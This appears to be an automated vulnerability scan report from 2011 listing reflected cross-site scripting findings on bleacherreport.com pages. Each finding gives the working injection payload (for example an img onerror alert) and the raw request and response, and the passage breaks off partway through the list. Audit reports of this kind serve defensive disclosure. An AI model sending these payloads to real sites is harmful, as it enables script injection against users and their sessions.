<ul>\n\t\t\t\t<div id=\"facebook_questions\">\n\t\t\t<li class=\"fb-question\" id=\"facebook_full_name_container\">\n\t\t\t\t<p class=\"question\">\n\t\t\t\t\t<label for=\"facebook_user_use_full_name\">Use your full name <strong class=\"full_name\"></strong>&nbsp;on Bleacher Report?</label>\n\t\t\t\t\t<br />\n\t\t\t\t</p>\n\t\t\t\t<p class=\"options\">\n\t\t\t\t\t<input name=\"facebook_user[use_full_name]\" type=\"hidden\" value=\"0\" /><input checked=\"checked\" id=\"facebook_user_use_full_name\" name=\"facebook_user[use_full_name]\" type=\"checkbox\" value=\"1\" />\n\t\t\t\t\t<label for=\"facebook_user_use_full_name\">Yes</label>\n\t\t\t\t</p>\n\t\t\t\t<div class=\"input full-name-edit\" style=\"display:none\">\n\t\t\t\t\t<p>Edit your name for Bleacher Report:</p>\n\t\t\t\t\t<div class=\"fb-first-name\">\n\t\t\t\t\t\t<label for=\"facebook_user_first_name\">First Name <em>(required)</em></label>\n\t\t\t\t\t\t<input class=\"signup_text_input\" id=\"facebook_user_first_name\" name=\"facebook_user[first_name]\" size=\"30\" type=\"text\" />\n\t\t\t\t\t\t\n\t\t\t\t\t</div>\n\t\n\t\t\t\t\t<div class=\"fb-last-name\">\n\t\t\t\t\t\t<label for=\"facebook_user_last_name\">Last Name <em>(required)</em></label>\n\t\t\t\t\t\t<input class=\"signup_text_input\" id=\"facebook_user_last_name\" name=\"facebook_user[last_name]\" size=\"30\" type=\"text\" />\n\t\t\t\t\t\t\n\t\t\t\t\t</div>\n\t\t\t\t</div>\n\t\t\t</li>\n\t\t\t<li class=\"fb-question\">\n\t\t\t\t<p class=\"question\">\n\t\t\t\t\t<img alt=\"Default-user-icon-medium\" class=\"profile_pic\" src=\"http://static.bleacherreport.net/images/default-user-icon-medium.png?1297385688\" />\n\t\t\t\t\t<label for=\"facebook_user_use_profile_pic\">Do you want to use your Facebook profile picture on Bleacher Report?</label>\n\t\t\t\t</p>\n\t\t\t\t<p class=\"options\">\n\t\t\t\t\t<input name=\"facebook_user[use_profile_pic]\" type=\"hidden\" value=\"0\" /><input checked=\"checked\" id=\"facebook_user_use_profile_pic\" name=\"facebook_user[u
...[SNIP]...

2. Cross-site scripting (reflected)  previous  next
There are 21 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


2.1. http://bleacherreport.com/archives/newswires [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bleacherreport.com
Path:   /archives/newswires

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f9cf3"><img%20src%3da%20onerror%3dalert(1)>0fb8c49ccd7 was submitted in the REST URL parameter 2. This input was echoed as f9cf3"><img src=a onerror=alert(1)>0fb8c49ccd7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /archives/newswiresf9cf3"><img%20src%3da%20onerror%3dalert(1)>0fb8c49ccd7 HTTP/1.1
Host: bleacherreport.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: partner_id=; _session_id=cb7453cba282bc07fc254fe28cc2571e;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Connection: close
Status: 200
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.10
X-Rack-Cache: miss
X-Runtime: 99
ETag: "635a79b13c15ead1f7ba69ab741f1edd"
Date: Tue, 15 Feb 2011 15:59:26 GMT
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _session_id=cb7453cba282bc07fc254fe28cc2571e; path=/; HttpOnly
Content-Length: 54198
Server: nginx/0.6.35 + Phusion Passenger 2.2.10 (mod_rails/mod_rack)

<!DOCTYPE html>
<html id="bleacherreport-com" class="no-js" lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
   <meta charset="utf-8">
   <ti
...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&amp;c2=6246855&amp;c3=&amp;c4=bleacherreport.com/archives/newswiresf9cf3"><img src=a onerror=alert(1)>0fb8c49ccd7&amp;c5=&amp;c6=&amp;c15=&amp;cv=1.3&amp;cj=1" width="0" height="0" alt="">
...[SNIP]...

2.2. http://bleacherreport.com/archives/newswires [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://bleacherreport.com
Path:   /archives/newswires

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 160b2"%3b32dc4cf6845 was submitted in the REST URL parameter 2. This input was echoed as 160b2";32dc4cf6845 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /archives/newswires160b2"%3b32dc4cf6845 HTTP/1.1
Host: bleacherreport.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: partner_id=; _session_id=cb7453cba282bc07fc254fe28cc2571e;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Connection: close
Status: 200
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.10
X-Rack-Cache: miss
X-Runtime: 62
ETag: "f75ba10ce49253f1005793532003f065"
Date: Tue, 15 Feb 2011 15:59:26 GMT
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _session_id=cb7453cba282bc07fc254fe28cc2571e; path=/; HttpOnly
Content-Length: 54114
Server: nginx/0.6.35 + Phusion Passenger 2.2.10 (mod_rails/mod_rack)

<!DOCTYPE html>
<html id="bleacherreport-com" class="no-js" lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
   <meta charset="utf-8">
   <ti
...[SNIP]...
<script>
   BR.analyticsLoggedIn = false;
   BR.analyticsPageType = "other";
       BR.partnerDomain = "";
   BR.teamTrackerPath = "";

        BR.teamTrackerPath = "/archives/newswires160b2";32dc4cf6845";        
   BR.teamTrackerPath += "?pagetype=" + BR.analyticsPageType + "&logged_in=" + BR.analyticsLoggedIn;
   
   if(BR.partnerDomain) { BR.teamTrackerPath += "&external_domain=" + BR.partnerDomain;
...[SNIP]...

2.3. http://bleacherreport.com/archives/newswires [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://bleacherreport.com
Path:   /archives/newswires

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e162e'%3be1a586e7c90 was submitted in the REST URL parameter 2. This input was echoed as e162e';e1a586e7c90 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /archives/newswirese162e'%3be1a586e7c90 HTTP/1.1
Host: bleacherreport.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: partner_id=; _session_id=cb7453cba282bc07fc254fe28cc2571e;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Connection: close
Status: 200
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.10
X-Rack-Cache: miss
X-Runtime: 393
ETag: "22bfda186cba2ab02f8b222a1c1b62ef"
Date: Tue, 15 Feb 2011 15:59:28 GMT
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _session_id=cb7453cba282bc07fc254fe28cc2571e; path=/; HttpOnly
Content-Length: 54114
Server: nginx/0.6.35 + Phusion Passenger 2.2.10 (mod_rails/mod_rack)

<!DOCTYPE html>
<html id="bleacherreport-com" class="no-js" lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
   <meta charset="utf-8">
   <ti
...[SNIP]...
<script>
        COMSCORE.beacon({
        c1: 2,
        c2: 6246855,
        c3: '',
        c4: 'http://bleacherreport.com/archives/newswirese162e';e1a586e7c90',
        c5: '',
        c6: '',
        c15: ''
        });
       </script>
...[SNIP]...

2.4. http://bleacherreport.com/pages/comguidelines [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bleacherreport.com
Path:   /pages/comguidelines

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 56671"><img%20src%3da%20onerror%3dalert(1)>bc43bbfef51 was submitted in the REST URL parameter 2. This input was echoed as 56671"><img src=a onerror=alert(1)>bc43bbfef51 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /pages/comguidelines56671"><img%20src%3da%20onerror%3dalert(1)>bc43bbfef51 HTTP/1.1
Host: bleacherreport.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: partner_id=; _session_id=cb7453cba282bc07fc254fe28cc2571e;

Response

HTTP/1.1 404 Not Found
Content-Type: text/html; charset=utf-8
Connection: close
Status: 404
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.10
X-Rack-Cache: miss
X-Runtime: 28
Date: Tue, 15 Feb 2011 15:57:50 GMT
Cache-Control: no-cache, private
Set-Cookie: _session_id=cb7453cba282bc07fc254fe28cc2571e; path=/; HttpOnly
Content-Length: 28452
Server: nginx/0.6.35 + Phusion Passenger 2.2.10 (mod_rails/mod_rack)

<!DOCTYPE html>
<html id="bleacherreport-com" class="no-js" lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
   <meta charset="utf-8">
   <ti
...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&amp;c2=6246855&amp;c3=&amp;c4=bleacherreport.com/pages/comguidelines56671"><img src=a onerror=alert(1)>bc43bbfef51&amp;c5=&amp;c6=&amp;c15=&amp;cv=1.3&amp;cj=1" width="0" height="0" alt="">
...[SNIP]...

2.5. http://bleacherreport.com/pages/comguidelines [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://bleacherreport.com
Path:   /pages/comguidelines

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cf504'%3bd50e5c88115 was submitted in the REST URL parameter 2. This input was echoed as cf504';d50e5c88115 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /pages/comguidelinescf504'%3bd50e5c88115 HTTP/1.1
Host: bleacherreport.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: partner_id=; _session_id=cb7453cba282bc07fc254fe28cc2571e;

Response

HTTP/1.1 404 Not Found
Content-Type: text/html; charset=utf-8
Connection: close
Status: 404
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.10
X-Rack-Cache: miss
X-Runtime: 44
Date: Tue, 15 Feb 2011 15:57:52 GMT
Cache-Control: no-cache, private
Set-Cookie: _session_id=cb7453cba282bc07fc254fe28cc2571e; path=/; HttpOnly
Content-Length: 28368
Server: nginx/0.6.35 + Phusion Passenger 2.2.10 (mod_rails/mod_rack)

<!DOCTYPE html>
<html id="bleacherreport-com" class="no-js" lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
   <meta charset="utf-8">
   <ti
...[SNIP]...
<script>
        COMSCORE.beacon({
        c1: 2,
        c2: 6246855,
        c3: '',
        c4: 'http://bleacherreport.com/pages/comguidelinescf504';d50e5c88115',
        c5: '',
        c6: '',
        c15: ''
        });
       </script>
...[SNIP]...

2.6. http://bleacherreport.com/pages/comguidelines [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://bleacherreport.com
Path:   /pages/comguidelines

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e507e"%3b316fead032b was submitted in the REST URL parameter 2. This input was echoed as e507e";316fead032b in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /pages/comguidelinese507e"%3b316fead032b HTTP/1.1
Host: bleacherreport.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: partner_id=; _session_id=cb7453cba282bc07fc254fe28cc2571e;

Response

HTTP/1.1 404 Not Found
Content-Type: text/html; charset=utf-8
Connection: close
Status: 404
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.10
X-Rack-Cache: miss
X-Runtime: 33
Date: Tue, 15 Feb 2011 15:57:51 GMT
Cache-Control: no-cache, private
Set-Cookie: _session_id=cb7453cba282bc07fc254fe28cc2571e; path=/; HttpOnly
Content-Length: 28368
Server: nginx/0.6.35 + Phusion Passenger 2.2.10 (mod_rails/mod_rack)

<!DOCTYPE html>
<html id="bleacherreport-com" class="no-js" lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
   <meta charset="utf-8">
   <ti
...[SNIP]...
<script>
   BR.analyticsLoggedIn = false;
   BR.analyticsPageType = "other";
       BR.partnerDomain = "";
   BR.teamTrackerPath = "";

        BR.teamTrackerPath = "/pages/comguidelinese507e";316fead032b";        
   BR.teamTrackerPath += "?pagetype=" + BR.analyticsPageType + "&logged_in=" + BR.analyticsLoggedIn;
   
   if(BR.partnerDomain) { BR.teamTrackerPath += "&external_domain=" + BR.partnerDomain;
...[SNIP]...

2.7. http://bleacherreport.com/pages/featuredcolumnists [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bleacherreport.com
Path:   /pages/featuredcolumnists

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ec9b3"><img%20src%3da%20onerror%3dalert(1)>576afc0bd7 was submitted in the REST URL parameter 2. This input was echoed as ec9b3"><img src=a onerror=alert(1)>576afc0bd7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /pages/featuredcolumnistsec9b3"><img%20src%3da%20onerror%3dalert(1)>576afc0bd7 HTTP/1.1
Host: bleacherreport.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: partner_id=; _session_id=cb7453cba282bc07fc254fe28cc2571e;

Response

HTTP/1.1 404 Not Found
Content-Type: text/html; charset=utf-8
Connection: close
Status: 404
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.10
X-Rack-Cache: miss
X-Runtime: 37
Date: Tue, 15 Feb 2011 15:57:55 GMT
Cache-Control: no-cache, private
Set-Cookie: _session_id=cb7453cba282bc07fc254fe28cc2571e; path=/; HttpOnly
Content-Length: 28464
Server: nginx/0.6.35 + Phusion Passenger 2.2.10 (mod_rails/mod_rack)

<!DOCTYPE html>
<html id="bleacherreport-com" class="no-js" lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
   <meta charset="utf-8">
   <ti
...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&amp;c2=6246855&amp;c3=&amp;c4=bleacherreport.com/pages/featuredcolumnistsec9b3"><img src=a onerror=alert(1)>576afc0bd7&amp;c5=&amp;c6=&amp;c15=&amp;cv=1.3&amp;cj=1" width="0" height="0" alt="">
...[SNIP]...

2.8. http://bleacherreport.com/pages/featuredcolumnists [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://bleacherreport.com
Path:   /pages/featuredcolumnists

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7dae0"%3bec3865667f4 was submitted in the REST URL parameter 2. This input was echoed as 7dae0";ec3865667f4 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /pages/featuredcolumnists7dae0"%3bec3865667f4 HTTP/1.1
Host: bleacherreport.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: partner_id=; _session_id=cb7453cba282bc07fc254fe28cc2571e;

Response

HTTP/1.1 404 Not Found
Content-Type: text/html; charset=utf-8
Connection: close
Status: 404
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.10
X-Rack-Cache: miss
X-Runtime: 36
Date: Tue, 15 Feb 2011 15:57:55 GMT
Cache-Control: no-cache, private
Set-Cookie: _session_id=cb7453cba282bc07fc254fe28cc2571e; path=/; HttpOnly
Content-Length: 28383
Server: nginx/0.6.35 + Phusion Passenger 2.2.10 (mod_rails/mod_rack)

<!DOCTYPE html>
<html id="bleacherreport-com" class="no-js" lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
   <meta charset="utf-8">
   <ti
...[SNIP]...
<script>
   BR.analyticsLoggedIn = false;
   BR.analyticsPageType = "other";
       BR.partnerDomain = "";
   BR.teamTrackerPath = "";

        BR.teamTrackerPath = "/pages/featuredcolumnists7dae0";ec3865667f4";        
   BR.teamTrackerPath += "?pagetype=" + BR.analyticsPageType + "&logged_in=" + BR.analyticsLoggedIn;
   
   if(BR.partnerDomain) { BR.teamTrackerPath += "&external_domain=" + BR.partnerDomain;
...[SNIP]...

2.9. http://bleacherreport.com/pages/featuredcolumnists [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://bleacherreport.com
Path:   /pages/featuredcolumnists

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f52f6'%3ba7d636058d9 was submitted in the REST URL parameter 2. This input was echoed as f52f6';a7d636058d9 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /pages/featuredcolumnistsf52f6'%3ba7d636058d9 HTTP/1.1
Host: bleacherreport.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: partner_id=; _session_id=cb7453cba282bc07fc254fe28cc2571e;

Response

HTTP/1.1 404 Not Found
Content-Type: text/html; charset=utf-8
Connection: close
Status: 404
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.10
X-Rack-Cache: miss
X-Runtime: 40
Date: Tue, 15 Feb 2011 15:57:56 GMT
Cache-Control: no-cache, private
Set-Cookie: _session_id=cb7453cba282bc07fc254fe28cc2571e; path=/; HttpOnly
Content-Length: 28383
Server: nginx/0.6.35 + Phusion Passenger 2.2.10 (mod_rails/mod_rack)

<!DOCTYPE html>
<html id="bleacherreport-com" class="no-js" lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
   <meta charset="utf-8">
   <ti
...[SNIP]...
<script>
        COMSCORE.beacon({
        c1: 2,
        c2: 6246855,
        c3: '',
        c4: 'http://bleacherreport.com/pages/featuredcolumnistsf52f6';a7d636058d9',
        c5: '',
        c6: '',
        c15: ''
        });
       </script>
...[SNIP]...

2.10. http://bleacherreport.com/pages/forum [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bleacherreport.com
Path:   /pages/forum

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7de4e"><img%20src%3da%20onerror%3dalert(1)>8d80a7be3ef was submitted in the REST URL parameter 2. This input was echoed as 7de4e"><img src=a onerror=alert(1)>8d80a7be3ef in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /pages/forum7de4e"><img%20src%3da%20onerror%3dalert(1)>8d80a7be3ef HTTP/1.1
Host: bleacherreport.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: partner_id=; _session_id=cb7453cba282bc07fc254fe28cc2571e;

Response

HTTP/1.1 404 Not Found
Content-Type: text/html; charset=utf-8
Connection: close
Status: 404
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.10
X-Rack-Cache: miss
X-Runtime: 30
Date: Tue, 15 Feb 2011 15:57:42 GMT
Cache-Control: no-cache, private
Set-Cookie: _session_id=cb7453cba282bc07fc254fe28cc2571e; path=/; HttpOnly
Content-Length: 28428
Server: nginx/0.6.35 + Phusion Passenger 2.2.10 (mod_rails/mod_rack)

<!DOCTYPE html>
<html id="bleacherreport-com" class="no-js" lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
   <meta charset="utf-8">
   <ti
...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&amp;c2=6246855&amp;c3=&amp;c4=bleacherreport.com/pages/forum7de4e"><img src=a onerror=alert(1)>8d80a7be3ef&amp;c5=&amp;c6=&amp;c15=&amp;cv=1.3&amp;cj=1" width="0" height="0" alt="">
...[SNIP]...

2.11. http://bleacherreport.com/pages/forum [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://bleacherreport.com
Path:   /pages/forum

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 989ca'%3ba08c3ca8e1e was submitted in the REST URL parameter 2. This input was echoed as 989ca';a08c3ca8e1e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /pages/forum989ca'%3ba08c3ca8e1e HTTP/1.1
Host: bleacherreport.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: partner_id=; _session_id=cb7453cba282bc07fc254fe28cc2571e;

Response

HTTP/1.1 404 Not Found
Content-Type: text/html; charset=utf-8
Connection: close
Status: 404
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.10
X-Rack-Cache: miss
X-Runtime: 46
Date: Tue, 15 Feb 2011 15:57:43 GMT
Cache-Control: no-cache, private
Set-Cookie: _session_id=cb7453cba282bc07fc254fe28cc2571e; path=/; HttpOnly
Content-Length: 28344
Server: nginx/0.6.35 + Phusion Passenger 2.2.10 (mod_rails/mod_rack)

<!DOCTYPE html>
<html id="bleacherreport-com" class="no-js" lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
   <meta charset="utf-8">
   <ti
...[SNIP]...
<script>
        COMSCORE.beacon({
        c1: 2,
        c2: 6246855,
        c3: '',
        c4: 'http://bleacherreport.com/pages/forum989ca';a08c3ca8e1e',
        c5: '',
        c6: '',
        c15: ''
        });
       </script>
...[SNIP]...

2.12. http://bleacherreport.com/pages/forum [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://bleacherreport.com
Path:   /pages/forum

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1ddb4"%3b5ff4f322e72 was submitted in the REST URL parameter 2. This input was echoed as 1ddb4";5ff4f322e72 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /pages/forum1ddb4"%3b5ff4f322e72 HTTP/1.1
Host: bleacherreport.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: partner_id=; _session_id=cb7453cba282bc07fc254fe28cc2571e;

Response

HTTP/1.1 404 Not Found
Content-Type: text/html; charset=utf-8
Connection: close
Status: 404
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.10
X-Rack-Cache: miss
X-Runtime: 28
Date: Tue, 15 Feb 2011 15:57:42 GMT
Cache-Control: no-cache, private
Set-Cookie: _session_id=cb7453cba282bc07fc254fe28cc2571e; path=/; HttpOnly
Content-Length: 28344
Server: nginx/0.6.35 + Phusion Passenger 2.2.10 (mod_rails/mod_rack)

<!DOCTYPE html>
<html id="bleacherreport-com" class="no-js" lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
   <meta charset="utf-8">
   <ti
...[SNIP]...
<script>
   BR.analyticsLoggedIn = false;
   BR.analyticsPageType = "other";
       BR.partnerDomain = "";
   BR.teamTrackerPath = "";

        BR.teamTrackerPath = "/pages/forum1ddb4";5ff4f322e72";        
   BR.teamTrackerPath += "?pagetype=" + BR.analyticsPageType + "&logged_in=" + BR.analyticsLoggedIn;
   
   if(BR.partnerDomain) { BR.teamTrackerPath += "&external_domain=" + BR.partnerDomain;
...[SNIP]...

2.13. http://bleacherreport.com/pages/privacy [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://bleacherreport.com
Path:   /pages/privacy

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3fff4'%3bb174f357c5f was submitted in the REST URL parameter 2. This input was echoed as 3fff4';b174f357c5f in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

